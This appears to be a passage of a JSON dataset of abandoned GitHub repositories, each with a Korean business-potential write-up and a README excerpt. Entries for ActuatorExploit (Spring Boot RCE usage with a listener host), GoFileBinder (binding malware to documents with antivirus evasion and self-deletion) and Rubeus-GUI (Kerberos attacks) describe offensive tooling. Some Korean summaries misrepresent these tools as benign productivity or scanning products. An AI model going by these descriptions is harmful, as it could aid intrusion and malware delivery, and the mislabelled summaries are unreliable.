src=\"https://top.gg/api/widget/servers/84716410416","composite_score":0.5012,"license_safety_tag":"unknown"},{"name":"boozallen/MOTIF","github_url":"https://github.com/boozallen/MOTIF","stars":19,"language":"Python","license":"NOASSERTION","abandonment_months":44,"description":"# MOTIF 저장소 분석\n\n## 왜 보물인가\n보즈 앨런 해밀턴(유명 컨설팅사)이 만든 프로젝트로, 복잡한 데이터를 시각적으로 이해하기 쉽게 변환하는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 분석 SaaS**: 데이터 분석 전문회사가 고객사에 제공하는 시각화 서비스로 활용\n2. **내부 의사결정 도구**: 대기업 경영진이 복잡한 통계를 간단히 ","readme_excerpt":"# MOTIF Dataset\n\nThe Malware Open-source Threat Intelligence Family (MOTIF) dataset contains 3,095 disarmed PE malware samples from 454 families, labeled with ground truth confidence. Family labels were obtained by surveying thousands of open-source threat reports published by 14 major cybersecurity organizations between Jan. 1st, 2016 Jan. 1st, 2021. The dataset also provides a comprehensive alias mapping for each family and EMBER raw features for each file.\n\nFurther information about the MOTIF dataset is provided in our [paper](https://arxiv.org/abs/2111.15031).\n\nIf you use the provided data or code, please make sure to cite our paper:\n\n```\n@inproceedings{joyce2022motif,\narchivePrefix = {arXiv},\narxivId = {arXiv:2111.15031v1},\nauthor = {Joyce, Robert J and Amlani, Dev and Nicholas, Charles and Raff, Edward},\nbooktitle = {The AAAI-22 Workshop on Artificial Intelligence for Cyber Security (AICS)},\neprint = {arXiv:2111.15031v1},\ntitle = {{MOTIF}: A Large Malware Reference Dataset with G","composite_score":0.5012,"license_safety_tag":"unknown"},{"name":"beakerbrowser/webdb","github_url":"https://github.com/beakerbrowser/webdb","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":91,"description":"# WebDB 저장소 분석\n\n## 왜 보물인가\n웹 브라우저에서 직접 데이터베이스를 만들고 관리할 수 있는 도구로, 복잡한 설치 없이 누구나 데이터를 정리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소규모 팀이 브라우저에서 고객 정보나 프로젝트 데이터를 직접 관리하는 간단한 CRM 도구\n- **내부 업무 도구**: 회사의 물품 재","readme_excerpt":"# WebDB\n\nA database that reads and writes records on dat:// websites. [How it works](#how-it-works)\n\n## Example\n\nInstantiate:\n\n```js\n// in the browser\nconst WebDB = require('@beaker/webdb')\nvar webdb = new WebDB('webdb-example')\n\n// in nodejs\nconst DatArchive = require('node-dat-archive')\nconst WebDB = require('@beaker/webdb')\nvar webdb = new WebDB('./webdb-example', {DatArchive})\n```\n\nDefine your table:\n\n```js\nwebdb.define('people', {\n  // validate required attributes before indexing\n  validate(record) {\n    assert(record.firstName && typeof record.firstName === 'string')\n    assert(record.lastName && typeof record.lastName === 'string')\n    return true\n  },\n\n  // secondary indexes for fast queries (optional)\n  index: ['lastName', 'lastName+firstName', 'age'],\n\n  // files to index\n  filePattern: [\n    '/person.json',\n    '/people/*.json'\n  ]\n})\n```\n\nThen open the DB:\n\n```js\nawait webdb.open()\n```\n\nNext we add archives to be indexed into the database.\n\n```js\nawait webdb.indexArchive('d","composite_score":0.5012,"license_safety_tag":"safe"},{"name":"VbScrub/Rubeus-GUI","github_url":"https://github.com/VbScrub/Rubeus-GUI","stars":23,"language":"C#","license":"NOASSERTION","abandonment_months":53,"description":"# Rubeus-GUI 사업화 분석\n\n## 왜 보물인가\n보안 업계에서 복잡한 시스템 접근 권한을 간단한 그래픽 인터페이스로 관리할 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **기업 보안 관리 SaaS**: 중소 기업의 IT 관리자가 직원 접근 권한을 시각적으로 관리하는 웹 서비스\n- **내부 업무 도구**: 대규모 금융사나 정부기관의 보안","readme_excerpt":"# Rubeus GUI\r\n\r\n### What is it?\r\n A WPF front end for the command line [Rubeus](https://github.com/GhostPack/Rubeus) tool, which is used to perform various Kerberos attacks such as Kerberoasting, golden ticket attacks, AS-REP roasting, etc.\r\n \r\n ### How do I get it?\r\n An early Alpha version is now available from the Releases section on the right (or wherever github have moved it to this week)\r\n \r\n  ### Prerequisites\r\n - .NET Framework 4.5\r\n \r\n ### Screenshots\r\n \r\n Kerberoasting:\r\n \r\n ![img1](https://raw.githubusercontent.com/VbScrub/Rubeus-GUI/GUI-master/Rubeus03.png)\r\n \r\n Brute forcing from username and password wordlists (without any valid domain credentials):\r\n \r\n ![img2](https://raw.githubusercontent.com/VbScrub/Rubeus-GUI/GUI-master/Rubeus04.png)\r\n \r\n\r\n\r\n","composite_score":0.5012,"license_safety_tag":"unknown"},{"name":"darglein/Snake-SLAM","github_url":"https://github.com/darglein/Snake-SLAM","stars":12,"language":"C++","license":"MIT","abandonment_months":37,"description":"# Snake-SLAM 상용화 분석\n\n## 왜 보물인가\n로봇과 드론이 자신의 위치를 파악하고 지도를 만드는 기술을 저비용으로 구현할 수 있어, 배송 자동화나 시설 점검 같은 현실의 비즈니스에 즉시 적용 가능합니다.\n\n## 어디에 쓸 수 있나\n\n1. **자율주행 배송 로봇 SaaS**: 음식점·병원이 배송 로봇을 월 구독으로 임차하는 서비스에 탑재\n2. **","readme_excerpt":"# Snake-SLAM\n\n*Abstract.*\nSnake-SLAM is a scalable visual inertial SLAM system for autonomous navigation in low-power aerial devices.\nThe tracking front-end features map reuse, loop closing, relocalization, and supports monocular, stereo, and RGBD input.\nThe keyframes are reduced by a graph-based simplification approach and further refined using a novel deferred mapping stage to ensure a sparse yet accurate global map.\nThe optimization back-end decouples IMU state estimation from visual bundle adjustment and solves them separately in two simplified sub problems.\nThis greatly reduces computational complexity and allows Snake-SLAM to use a larger local window size than existing SLAM methods.\nOur system implements a novel multi-stage VI initialization scheme, which uses gyroscope data to detect visual outliers and recovers metric velocity, gravity, and scale.\nWe evaluate Snake-SLAM on the EuRoC dataset and show that it outperforms all other approaches in efficiency while also achieving st","composite_score":0.5012,"license_safety_tag":"safe"},{"name":"optiv/OSINT_Encyclopedia","github_url":"https://github.com/optiv/OSINT_Encyclopedia","stars":10,"language":"","license":"MIT","abandonment_months":26,"description":"# OSINT_Encyclopedia 상용화 분석\n\n## 왜 보물인가\n인터넷에 공개된 정보들을 체계적으로 수집하고 분석하는 방법을 정리한 백과사전으로, 기업의 보안 위협 감시부터 언론사의 팩트체크까지 매우 광범위한 분야에서 필요로 합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업 보안 모니터링 SaaS**\n- 회사 명성 감시 도구로 구성하여 '우리 회사가","readme_excerpt":"\n\n# OSINT Encyclopedia\n#### Credit: [Cham423](https://github.com/cham423) \n\nThis checklist is designed to increase the success of your open-source intelligence (OSINT) operations by collecting a comprehensive list of information about your target. Understanding the fundamentals of OSINT is a prerequisite to using this checklist, as detailed technical operations will not be captured here. This list will be a working document that is driven by the community and maintained by Optiv.\n\n\n## OSINT Checklist for ALL Engagements\n\n- [ ]  Social Media\n    - [ ]  Corporate/Busniess Controlled Content\n        - [ ]  LinkedIn\n        - [ ]  Facebook\n        - [ ]  Instagram\n    - [ ]  Employee Controlled Content\n        - [ ]  Instagram facility analysis\n        - [ ]  Instagram hashtag review\n- [ ]  Office 365\n    - [ ]  getuserrealm.srf\n- [ ]  DNS\n    - [ ]  dnsdumpster\n    - [ ]  amass\n    - [ ]  horizontal (other domains owned by the same entity) and vertical (subdomain) domain enumeration\n     ","composite_score":0.5012,"license_safety_tag":"safe"},{"name":"jashandeep-sohi/webcam-filters","github_url":"https://github.com/jashandeep-sohi/webcam-filters","stars":25,"language":"Python","license":"GPL-3.0","abandonment_months":29,"description":"# webcam-filters 상용화 분석\n\n## 왜 보물인가\n웹캠 영상에 실시간으로 재미있는 효과를 추가하는 기술로, 화상 회의나 라이브 방송에서 자신의 외모를 향상시키거나 재미를 더하고 싶은 모든 사람이 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 화상 회의 플러그인**\n- Zoom, Google Meet 같은 회의 도구","readme_excerpt":"|pypi-badge| |nix-ci-badge|\n\nwebcam-filters\n==============\n\nAdd filters (background blur, etc) to your webcam on Linux.\n\nVideo conferencing applications tend to either lack video effects altogether or\nsupport only a limited set of capabilities on Linux (e.g. Zoom [#]_, Google Meets [#]_).\n\nGoal here is to provide a virtual webcam via ``v4l2loopback`` with a common\nset of filters that can be used everywhere.\n\n.. contents:: :local:\n\n\nUsage\n-----\nPassthrough (no-op)::\n\n  $ webcam-filters --input-dev /dev/video0 --output-dev /dev/video3\n\nBlur background::\n\n  $ webcam-filters --input-dev /dev/video0 --output-dev /dev/video3 --background-blur 150\n\nHardware acceleration (via VAAPI)::\n\n  $ webcam-filters --input-dev /dev/video0 --output-dev /dev/video3 --background-blur 150 --hw-accel-api vaapi\n\nUsing docker::\n\n  $ docker run -it \\\n    --device=/dev/video0:/input-dev \\\n    --device=/dev/video3:/output-dev \\\n    ghcr.io/jashandeep-sohi/webcam-filters:master --background-blur 50\n\nDependencies\n--","composite_score":0.5012,"license_safety_tag":"restricted"},{"name":"yanghtr/Sync2Gen","github_url":"https://github.com/yanghtr/Sync2Gen","stars":26,"language":"Python","license":"unknown","abandonment_months":58,"description":"# Sync2Gen 평가 리포트\n\n## 왜 보물인가\n서로 다른 형식의 데이터를 자동으로 동기화하고 생성해주는 기술로, 반복적인 데이터 관리 작업을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **CRM 자동화 SaaS**: 여러 고객 정보 시스템을 연결해 데이터가 자동으로 최신 상태 유지\n2. **재고 관리 API**: 오프라인 매장과 온","readme_excerpt":"# Sync2Gen\nCode for ICCV 2021 paper: [Scene Synthesis via Uncertainty-Driven Attribute Synchronization](https://arxiv.org/abs/2108.13499)\n\n<div align=\"center\">\n  <img width=\"100%\" alt=\"results\" src=\"imgs/results.png\">\n</div>\n\n## 0. Environment\nEnvironment: `python 3.6` and `cuda 10.0` on Ubuntu 18.04\n- Pytorch 1.4.0\n- tensorflow 1.14.0 (for tensorboard)\n\n## 1. Dataset\n```\n├──dataset_3dfront/\n    ├──data\n        ├── bedroom\n            ├── 0_abs.npy\n            ├── 0_rel.pkl\n            ├── ...\n        ├── living\n            ├── 0_abs.npy\n            ├── 0_rel.pkl\n            ├── ...\n        ├── train_bedroom.txt\n        ├── train_living.txt\n        ├── val_bedroom.txt\n        └── val_living.txt\n```\nSee [3D-FRONT Dataset](./dataset_3dfront/README.md) for dataset generation.\n\n## 2. VAE\n\n### 2.1 Generate scenes from random noises\nDownload the pretrained model from [https://drive.google.com/file/d/1VKNlEdUj1RBUOjBaBxE5xQvfsZodVjam/view?usp=sharing](https://drive.google.com/file/d/1VKNlEdUj","composite_score":0.5012,"license_safety_tag":"unknown"},{"name":"LFYSec/ActuatorExploit","github_url":"https://github.com/LFYSec/ActuatorExploit","stars":19,"language":"Python","license":"unknown","abandonment_months":67,"description":"# ActuatorExploit 저장소 분석\n\n## 왜 보물인가\n이 프로젝트는 기업 시스템의 숨겨진 제어 기능을 찾아내는 보안 검사 도구로, 보안 취약점을 미리 발견하려는 기업들이 필요로 합니다.\n\n## 어디에 쓸 수 있나\n1. **보안 진단 SaaS**: 기업 고객이 자신의 시스템을 검사하는 클라우드 서비스로 제공\n2. **내부 보안팀 도구**: 대기업의","readme_excerpt":"# ActuatorExploit\nSpringBoot Actuator未授权自动化利用，支持信息泄漏/RCE\n\n## About\n参考 https://github.com/LandGrey/SpringBootVulExploit  \nSpringBoot Actuator各种姿势的半自动化利用，landgrey师傅的项目中有的姿势都已集成\n\n## Usage\n```\nusage: ActuatorExploit.py [-h] [-t TARGET] [-w WAY] [-v VERSION] [-p VPS]\n                          [-i INFO]\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -t TARGET, --target TARGET\n                        target url, like http://127.0.0.1\n  -w WAY, --way WAY     scan way, input leak/rce\n  -v VERSION, --version VERSION\n                        sb version, input 1/2, 2 is /actuator/xxx\n  -p VPS, --vps VPS     listener vps ip\n  -i INFO, --info INFO  info to leak\n```\n\n### RCE：\npython3 check.py -t http://127.0.0.1:9094 -w rce -v 1 -p vsp:1234\n\n![](https://pic-1257433408.cos.ap-chengdu.myqcloud.com/2020/10/15/16027483264063.jpg)\n\n注1：snakeyaml利用需要的反弹shell exp见yaml-payload，运行1.sh即可编译。\n注2：[RR's exp](https://static.anquanke.com/download/b/security-geek-2019-q1/article-10.html)","composite_score":0.5012,"license_safety_tag":"unknown"},{"name":"Tencent/WeChat-TFCC","github_url":"https://github.com/Tencent/WeChat-TFCC","stars":24,"language":"C++","license":"unknown","abandonment_months":59,"description":"# Tencent/WeChat-TFCC 분석\n\n## 왜 보물인가\n텐센트의 공식 기술을 활용해 WeChat(중국 최대 메신저) 플랫폼과 연동하는 애플리케이션을 만들 수 있는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중국 시장 진출을 원하는 기업들을 위한 WeChat 통합 플랫폼 제공\n2. **내부 업무 도구**: 대규모 조직","readme_excerpt":"# TFCC\n\nTFCC is a C++ deep learning inference framework.\n\nTFCC provides the following toolkits that faciliate your development and deployment of your trained DL models:\n\n|Porject|Source|Description|\n|---|---|---|\n|[TFCC](./tfcc/README.md)|`./tfcc`|The core of deep learning inference library. It provides friendly interfaces for model deployment, as well as the implementation of diverse operations in both MKL and CUDA environments. |\n|TFCC Code Generator|`./tfcc_code_generator`|An automatic generator that can optimize the structure of your high-level models (tensorflows, pytorch, etc.) and generate the TFCC model.|\n|TFCC Runtime|`./tfcc_runtime`|An runtime to load TFCC model and inference.|\n\n# BUILD\nRun\n\n`./build.sh ${INSTALL_PREFIX_PATH}`\n\n# Quick Start\n1. Convert Model\n\n    The script `generator.py` can convert onnx model or tensorflow model to tfcc model. The docs [Convert ONNX Model](https://github.com/Tencent/WeChat-TFCC/blob/master/samples/ConvertONNXModel.md) and [Convert TF Model","composite_score":0.5012,"license_safety_tag":"unknown"},{"name":"inspiringz/GoFileBinder","github_url":"https://github.com/inspiringz/GoFileBinder","stars":6,"language":"Go","license":"unknown","abandonment_months":55,"description":"# GoFileBinder 상용화 분석\n\n## 왜 보물인가\n여러 파일을 한 번에 묶어서 관리하는 번거로움을 자동화해주는 도구로, 반복적인 파일 작업을 하는 모든 직장인의 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **문서 자동화 SaaS**: 회사의 계약서, 보고서, 이력서 등 여러 파일을 자동으로 정리해서 PDF로 만들어주는 웹 서비","readme_excerpt":"# GoFileBinder\n\nA builder 🔨 for binding evil program 😈 and normal document 🐣\n\n![image-20211130010534997](images/image-20211130010534997.png)\n\n## Usage\n\nClone this repo and build GoFileBinder.go first, then start:\n\n```bash\n./GoFileBinder <evil_program> <bind_file> [x64/x86]\n```\n\nWhen the Output File is executed on the target machine, it will release your evil program to `C:\\Users\\Public\\Music\\`, and then self-delete after run normal file and evil program.\n\n![image-20211130013907004](images/image-20211130013907004.png)\n\n> You can add an icon to it through [rcedit](https://github.com/electron/rcedit) or [rsrc](https://github.com/akavel/rsrc),note that some icons may be marked as malicious by the anti-virus due to past malicious behavior.\n\n## Feature\n\n- Reduce the risk of being detected by anti-virus ~~and human~~\n- Encrypt evil program via 3DES with random key\n- Self delete after releasing the normal file and executing the evil program\n- Use local variable instead of string literal to pas","composite_score":0.5012,"license_safety_tag":"unknown"},{"name":"sustainers/awesome-oss-funding","github_url":"https://github.com/sustainers/awesome-oss-funding","stars":29,"language":"","license":"CC0-1.0","abandonment_months":60,"description":"","readme_excerpt":"# Awesome OSS Funding [![Awesome](https://awesome.re/badge.svg)](https://awesome.re)\n\n> A curated list of awesome resources for funding open source projects and authors.\n\n\n## Contents\n\n<!-- toc -->\n\n- [Products](#products)\n- [Donations](#donations)\n- [Bounties](#bounties)\n- [Licensing](#licensing)\n- [Articles](#articles)\n- [Organizations](#organizations)\n- [Related](#related)\n\n<!-- tocstop -->\n\n## Products\n\n- [Saasify](https://saasify.sh) - Provides monetized APIs on top of OSS projects.\n- [CodeFund](https://codefund.io) - Provides funding for makers via ethical ads.\n- [Tidelift](https://tidelift.com) - Provides subscriptions connecting businesses with OSS devs.\n- [FOSSA](https://fossa.com) - Open source management for enterprise teams.\n- [Gitcoin](https://gitcoin.co) - Crowdfunding and freelance devs for your software projects.\n- [Back Your Stack](https://backyourstack.com) - Discover your dependencies and financially support them.\n- [Scarf](https://scarf.sh) - Provides monetized CLIs","composite_score":0.5012,"license_safety_tag":"unknown"},{"name":"oslabs-beta/SpeQL8","github_url":"https://github.com/oslabs-beta/SpeQL8","stars":28,"language":"JavaScript","license":"MIT","abandonment_months":61,"description":"# SpeQL8 분석 보고서\n\n## 왜 보물인가\n데이터베이스에서 원하는 정보를 쉽게 찾을 수 있도록 도와주는 도구로, 기술 전문가가 아닌 일반 직원도 복잡한 데이터 검색을 간단하게 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 데이터 분석 플랫폼으로 판매하여 중소 기업의 업무 효율성 향상\n- **내부 업무 도구**:","readme_excerpt":"<p align=\"center\">\n<img src=\"https://cdn.discordapp.com/attachments/825525502444961872/849873256672002068/SpeQL81.png\" width=\"300\" />\n</p>\n<h1 align =\"center\">SpeQL8</h1>\n<p align=\"center\">Speculative GraphQL metrics for your Postgres databases</p>\n<p align=\"center\">✨✨✨</p>\n\n___\n## About\nSpeQL8 enables you to run GraphQL queries on an existing Postgres database and collect request-response metrics per query.  View and compare query response times from both your database and from a lightning fast Redis cache, all in the comfort and security of your local development environment.\n\nUpload a .sql or .tar file to spin up your postgres database from SpeQL8 or simply plug in a Postgres database client URL (e.g. ElephantSQL).\n\n___\n## Get Started With SpeQL8:\nYou can either spin up locally on your own machine, or inside a Docker container:\n\nA) Local Install\n* Fork and clone this repository\n* Ensure you have an instance of Redis Server active.\n* Run `npm install && npm build && npm start`\n* Open","composite_score":0.5012,"license_safety_tag":"safe"},{"name":"mdisec/golang-for-hackers-turkish-edition","github_url":"https://github.com/mdisec/golang-for-hackers-turkish-edition","stars":10,"language":"","license":"unknown","abandonment_months":44,"description":"# golang-for-hackers-turkish-edition 분석\n\n## 왜 보물인가\n보안 전문가가 되고 싶은 사람들을 위해 프로그래밍 언어를 쉽게 배울 수 있도록 정리한 터키어 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 보안 입문자 대상 구독형 프로그래밍 강의 서비스\n2. **기업 보안 교육**: 중소 IT회사의 ","readme_excerpt":"# Golang for Hackers Türkçe Eğitimi\nMDISEC Twitch kanalında yapılan `Golang for Hackers` isimli eğitim serisine ait materyallerin bulunduğu repodur. Siber güvenlik ile ilgili diğer tüm eğitimlerin linklerine https://github.com/mdisec/mdisec-twitch-yayinlari adresinden erişebilirsin.\n\nBu eğitim serisi, başta Orhun(https://github.com/obegendi) olmak üzere, Ege Balcı(https://github.com/EgeBalci) ve topluluğun golang ile ilgili bilgisi olan muhtelif diğer bireyleri tarafından birlikte üretilmektedir.\n\n## Yayın kataloğu\n\n  1. 0x01 | Golang For Hackers - Hellooooooo !\n     * [https://www.twitch.tv/videos/1143860097](https://www.twitch.tv/videos/1143860097)\n     * [https://www.youtube.com/watch?v=jR683fqYVOo](https://www.youtube.com/watch?v=jR683fqYVOo)\n\t * [0x01 Lecture Notes](lecturenotes/0x01.md)\n  2. 0x02 | Golang For Hackers - Show Must \"Go\" on !\n     * [https://www.twitch.tv/videos/1150652332](https://www.twitch.tv/videos/1150652332)\n     * [https://www.youtube.com/watch?v=pd1KdCinFA4](","composite_score":0.5012,"license_safety_tag":"unknown"},{"name":"lewis6991/impatient.nvim","github_url":"https://github.com/lewis6991/impatient.nvim","stars":7,"language":"Lua","license":"MIT","abandonment_months":37,"description":"# impatient.nvim 분석 보고서\n\n## 왜 보물인가\n텍스트 편집기(Neovim)의 로딩 속도를 획기적으로 높여주는 도구로, 개발자들의 작업 효율성을 대폭 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발자 생산성 SaaS**: 원격 개발 환경이나 클라우드 코딩 플랫폼에 내장하여 사용자 경험 개선\n2. **기업 개발팀 내부 도구**:","readme_excerpt":"# NOTICE\n\nAs of Neovim 0.9, this plugin is no longer required. Instead run:\n\n```lua\nvim.loader.enable()\n```\n\n# impatient.nvim\n\n[![CI](https://github.com/lewis6991/impatient.nvim/workflows/CI/badge.svg?branch=main)](https://github.com/lewis6991/impatient.nvim/actions?query=workflow%3ACI)\n\nSpeed up loading Lua modules in Neovim to improve startup time.\n\n## Optimisations\n\nThis plugin does several things to speed loading Lua modules and files.\n\n### Implements a chunk cache\n\nThis is done by using `loadstring` to compile the Lua modules to bytecode and stores them in a cache file. The cache is invalidated using as hash consisting of:\n\n- The modified time (`sec` and `nsec`) of the file path.\n- The file size.\n\nThe cache file is located in `$XDG_CACHE_HOME/nvim/luacache_chunks`.\n\n### Implements a module resolution cache\n\nThis is done by maintaining a table of module name to path. The cache is invalidated only if a path no longer exists.\n\nThe cache file is located in `$XDG_CACHE_HOME/nvim/luacac","composite_score":0.5012,"license_safety_tag":"safe"},{"name":"lili-lei/SummerSchool2021_MLAS","github_url":"https://github.com/lili-lei/SummerSchool2021_MLAS","stars":10,"language":"R","license":"unknown","abandonment_months":58,"description":"# SummerSchool2021_MLAS 분석\n\n## 왜 보물인가\n2021년 여름학교 교육 자료로, 머신러닝과 데이터 분석을 배우고 싶은 학생들을 위한 학습 교재 모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼**: 대학이나 학원이 자사 온라인 강의 플랫폼에 이 자료를 통합하여 학생들에게 제공\n2. **내부 직원 교육**: IT 회사","readme_excerpt":"# SummerSchool2021_MLAS\nThe 2021 Summer School titled by \"Machine Learning for Atmospheric Scicences\" is organized by the Key Laboratory of Mesocale Severe Weather, School of Atmospheric Sciences, Nanjing University. It will be virtually held on 23-27 August 2021.\n\nOur lecturers are Dr. Xiaomeng Huang from Tsinghua University and Dr. Hailiang Du from Durhan University. \n\nIf you are willing to distribute the code and data from the summer school, please consult the lecturers and us first. \n\nDuring the summer school, any questions and comments can be submitted to the \"Issues\" on the top of the mainpage.\n\nWe welcome any comments and feedbacks about the summer school, which can be sent to lililei@nju.edu.cn. \n","composite_score":0.5012,"license_safety_tag":"unknown"},{"name":"dylanaraps/pash","github_url":"https://github.com/dylanaraps/pash","stars":12,"language":"Shell","license":"MIT","abandonment_months":37,"description":"# dylanaraps/pash 상용화 분석\n\n## 왜 보물인가\n셸 스크립트(컴퓨터에 명령을 내리는 프로그램)를 더 쉽고 안전하게 만들어주는 도구로, 프로그래머들의 실수를 줄여주고 작업 속도를 높입니다.\n\n## 어디에 쓸 수 있나\n\n1. **서버 관리 자동화 SaaS**: 웹사이트나 앱을 운영하는 기업들이 일일이 손으로 하던 서버 점검·업데이트 작업을 자동","readme_excerpt":"# pash\n\nA simple password manager using GPG written in POSIX `sh`.\n\n- Written in safe and [shellcheck](https://www.shellcheck.net/) compliant POSIX `sh`.\n- Only `120~` LOC (*minus blank lines and comments*).\n- Compatible with `pass`'s password store.\n- Clears the clipboard after a timeout.\n- Configurable password generation using `/dev/urandom`.\n- Guards against `set -x`, `ps` and `/proc` leakage.\n- Easily extendible through the shell.\n\n## Table of Contents\n\n<!-- vim-markdown-toc GFM -->\n\n* [Dependencies](#dependencies)\n* [Usage](#usage)\n* [FAQ](#faq)\n    * [How does this differ from `pass` or etc?](#how-does-this-differ-from-pass-or-etc)\n    * [Where are passwords stored?](#where-are-passwords-stored)\n    * [How can I use a public key?](#how-can-i-use-a-public-key)\n    * [How do I change the password length?](#how-do-i-change-the-password-length)\n    * [How do I change the password generation pattern?](#how-do-i-change-the-password-generation-pattern)\n    * [How do I change the passwo","composite_score":0.5012,"license_safety_tag":"safe"},{"name":"fudan-zvg/SOFT","github_url":"https://github.com/fudan-zvg/SOFT","stars":7,"language":"Python","license":"MIT","abandonment_months":27,"description":"# SOFT 저장소 분석\n\n## 왜 보물인가\n구체적인 프로젝트 설명이 없어 정확한 가치 평가가 어렵지만, MIT 라이선스와 꾸준한 유지보수(2024년 3월 커밋)를 보면 재사용 가능한 실용적인 도구일 가능성이 있습니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 자동화 도구**: 팀의 반복 업무를 자동으로 처리하는 회사 전용 소프트웨어로 판매\n2. **","readme_excerpt":"# Softmax-free Linear Transformers\n\n![image](resources/structure.png)\n\n> [**SOFT: Softmax-free Transformer with Linear Complexity**](https://arxiv.org/abs/2110.11945),            \n> Jiachen Lu, Jinghan Yao, Junge Zhang, Xiatian Zhu, Hang Xu, Weiguo Gao, Chunjing Xu, Tao Xiang, Li Zhang  \n> **NeurIPS 2021**\n\n> [**Softmax-free Linear Transformers**](https://arxiv.org/abs/2207.03341),            \n> Jiachen Lu, Junge Zhang, Xiatian Zhu, Jianfeng Feng, Tao Xiang, Li Zhang  \n> **IJCV 2024**\n\n\n## What's new\n1. We propose a normalized softmax-free self-attention with stronger generalizability.\n2. SOFT is now avaliable on more vision tasks (object detection and semantic segmentation).\n\n## NEWS\n- [2024/02/12] Our journal extension [Softmax-free Linear Transformer](https://arxiv.org/abs/2207.03341) is accepted by IJCV.\n- [2022/07/05] SOFT is now available for downstream tasks! An efficient normalization is applied to SOFT. Please refer to [SOFT-Norm](https://github.com/fudan-zvg/SOFT/tree/normali","composite_score":0.5012,"license_safety_tag":"safe"},{"name":"airbus-seclab/c-compiler-security","github_url":"https://github.com/airbus-seclab/c-compiler-security","stars":27,"language":"Python","license":"CC-BY-SA-4.0","abandonment_months":43,"description":"# airbus-seclab/c-compiler-security 분석\n\n## 왜 보물인가\n프로그램 개발 시 보안 취약점을 자동으로 찾아내는 도구로, 항공우주 산업의 높은 보안 기준을 충족하려는 기업들에게 매우 필요합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소프트웨어 개발사들이 구독하여 코드 작성 시 실시간으로 보안 문제를 검사받는 ","readme_excerpt":"# Getting the maximum of your C compiler, for security\n\n- [GCC TL;DR](#gcc-tldr)\n- [Clang TL;DR](#clang-tldr)\n- [Microsoft Visual Studio 2019 TL;DR](#microsoft-visual-studio-2019-tldr)\n- [References](#references)\n\n### Introduction\n\nThis guide is intended to help you determine which flags you should use to\ncompile your C Code using GCC, Clang or MSVC, in order to:\n\n* detect the maximum number of bugs or potential security problems.\n* enable security mitigations in the produced binaries.\n* enable runtime sanitizers to detect errors (overflows, race conditions, etc.) and make fuzzing more efficient.\n\n\n**Disclaimer**:\n\nThe flags selected and recommended here were chosen to *maximize* the number of\nclasses of detected errors which could have a security benefit when enabled.\nCode generation options (such as `-fstack-protector-strong`) can also have\nperformance impacts.  It is up to you to assess the impact on your code base\nand choose the right set of command line options.\n\n\nComments are of ","composite_score":0.5012,"license_safety_tag":"unknown"},{"name":"hunzaboy/Light-Modal","github_url":"https://github.com/hunzaboy/Light-Modal","stars":6,"language":"HTML","license":"MIT","abandonment_months":74,"description":"# Light-Modal 상품화 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자에게 공지사항을 띄우거나 확인을 받을 때 필요한 가볍고 간단한 도구로, 개발자들이 복잡한 과정 없이 빠르게 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 사용자가 중요한 알림이나 설정 변경을 확인하는 팝업 창 제공\n- **내부 업무 도구**: 회사","readme_excerpt":"<h3>Light Modal</h3>\n\n<img src=\"https://badgen.net/npm/v/light-modal\"/><img src=\"https://badgen.net/npm/dw/light-modal\"/>\n\n<a href=\"https://hunzaboy.github.io/Light-Modal/\">View the Awesome Demo</a>\n<p>A simple light-weight yet <strong>Powerful</strong> and <strong>Customizable</strong> <code>css</code> modal for content and images.</p>\n<p><a href=\"https://hunzaboy.github.io/Light-Modal/\"><img src=\"screen-2.png\" alt=\"screenshot\"><img src=\"screen.png\" alt=\"screenshot\"> </a>\n<hr />\n<a href=\"https://hunzaboy.github.io/Light-Modal/\"> Click here for a DEMO &\n How to use</a>\n \n <h3>Compatibility </h3>\n IE9+, Safari, Chrome, Firefox \n \n <em>Light Modal uses Flex and Target CSS properties.</em>\n\n\n<h3>To Do </h3>\n<em>Fell free to submit a PR </em>\n\n- [ ] JS Version\n- [ ] IE9 and/or below\n\n<h3>Changelog</h3>\nv 1.2.0 - Updated package.json, added css variables, removed gulp for building etc\nv 1.1.0 - Added new Gallery Mode\n<hr>\n\n<a href='https://ko-fi.com/W7W112WHD' target='_blank'><img height='3","composite_score":0.5012,"license_safety_tag":"safe"},{"name":"EmilTholin/image-trace-loader","github_url":"https://github.com/EmilTholin/image-trace-loader","stars":24,"language":"JavaScript","license":"MIT","abandonment_months":41,"description":"# EmilTholin/image-trace-loader 분석\n\n## 왜 보물인가\n흐릿한 사진을 깔끔한 선 그림으로 자동 변환해주는 기술로, 웹사이트 로딩 속도를 획기적으로 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **이커머스 SaaS**: 온라인 쇼핑몰 플랫폼이 상품 이미지를 자동으로 경량화하여 고객의 페이지 로딩 시간을 50% 단축\n- **콘","readme_excerpt":"[![npm][npm]][npm-url]\n\n# Image Trace Loader\nLoads images and exports traced outlines as image/svg+xml URL-encoded data\n\n## Install\n```bash\nnpm install --save-dev image-trace-loader\n```\n\n## Inspiration\nI saw [Mikael Ainalem's fantastic CodePen](https://twitter.com/mikaelainalem/status/918213244954861569) showcasing this technique, and I wanted a way to automate the process.\n\n## Usage\nThe `image-trace-loader` loads your image and exports the url of the image as `src` and the image/svg+xml URL-encoded data as `trace`.\n\n```js\nimport { src, trace } from './image.png';\n```\n\n**webpack.config.js**\n```js\nmodule.exports = {\n  module: {\n    rules: [\n      {\n        test: 